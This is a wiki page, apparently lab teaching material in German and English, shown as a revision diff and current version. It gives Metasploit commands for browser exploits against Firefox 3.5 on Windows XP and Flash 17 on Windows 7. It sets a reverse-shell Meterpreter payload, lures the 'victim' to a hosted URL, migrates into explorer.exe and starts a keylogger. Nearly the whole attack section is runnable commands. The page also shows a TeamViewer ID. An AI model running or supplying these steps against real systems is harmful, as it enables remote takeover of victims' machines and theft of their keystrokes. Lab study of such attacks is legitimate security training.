Metasploit browser Exlpoit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=Setup Opfer= Winxp Service pack 3 Firefox 3.5 =Setup Hacker= Kali Linux ip: 192.168.242.53 =vorgehen= starte metasploit msfconsole use exploit/multi/brow…“)
 
 
(11 dazwischenliegende Versionen von einem anderen Benutzer werden nicht angezeigt)
Zeile 1: Zeile 1:
=Setup Opfer=
+
=Setup target=
 
Winxp Service pack 3
 
Winxp Service pack 3
 
Firefox 3.5
 
Firefox 3.5
Zeile 7: Zeile 7:
 
ip: 192.168.242.53
 
ip: 192.168.242.53
  
=vorgehen=
+
=Action=
starte metasploit
+
start metasploit
 
  msfconsole
 
  msfconsole
  
Zeile 20: Zeile 20:
 
  exploit
 
  exploit
  
  jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
+
  jetzt muss das opfer mit dem firefox diese url aufrufen http://192.168.242.53:8888/hack
 
  wenn wir meterpreter > sehen hat der exploit funktioniert  
 
  wenn wir meterpreter > sehen hat der exploit funktioniert  
  
Zeile 36: Zeile 36:
  
  
* Setup Opfer
+
* Setup target
  
 
win732 bit
 
win732 bit
Zeile 51: Zeile 51:
 
ip 192.168.244.50
 
ip 192.168.244.50
  
===auf der konsole===
+
===on the console===
metasploit konsole starten
+
start metasploit console
 
*msfconsole
 
*msfconsole
auswahl des exploits
+
Selection of the exploits
 
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
 
*use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
+
selection of malicious software
 
*set payload windows/meterpreter/reverse_tcp
 
*set payload windows/meterpreter/reverse_tcp
setzen des localhost
+
put the localhost
 
*set lhost 192.168.244.50
 
*set lhost 192.168.244.50
setzen des webservers
+
putting the web server
 
*set srvhost 192.168.244.50
 
*set srvhost 192.168.244.50
pfad zum hack
+
path to the hack
 
*set uripath /hack
 
*set uripath /hack
ausführen des exploits
+
execute the exploits
 
*exploit
 
*exploit
  
=auf dem opfer=
+
=on the target=
*gehen mit win7 auf http://192.168.244.150:8080/hack
+
*go up with win7 to http://192.168.244.150:8080/hack
=auf dem hackersystem=
+
 
 +
=on the hackersystem=
 
==commandos==
 
==commandos==
 
  sessions -l (listet die sessions)
 
  sessions -l (listet die sessions)
Zeile 81: Zeile 82:
 
  keyscan_stop (stopt keyloger)
 
  keyscan_stop (stopt keyloger)
  
==vorgehnsweise==
+
==method==
session betreten
+
enter session
 
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
 
*msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
 
ps listing
 
ps listing
 
*meterpreter > ps
 
*meterpreter > ps

Aktuelle Version vom 14. Oktober 2020, 14:21 Uhr

Setup target

Winxp Service pack 3 Firefox 3.5

Setup Hacker

Kali Linux ip: 192.168.242.53

Action

start metasploit

msfconsole
use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit
jetzt muss das opfer mit dem firefox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert 
session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

Win7 32bit Exploit

http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html


  • Setup target

win732 bit

adobeflash 17.0.0.134

firefox

TeamViewer ID 597 708 786

Hackersystem

kali linux

ip 192.168.244.50

on the console

start metasploit console

  • msfconsole

Selection of the exploits

  • use exploit/windows/browser/adobe_flash_domain_memory_uaf

selection of malicious software

  • set payload windows/meterpreter/reverse_tcp

put the localhost

  • set lhost 192.168.244.50

putting the web server

  • set srvhost 192.168.244.50

path to the hack

  • set uripath /hack

execute the exploits

  • exploit

on the target

on the hackersystem

commandos

sessions -l (listet die sessions)
sessions -i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

method

enter session

  • msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1

ps listing

  • meterpreter > ps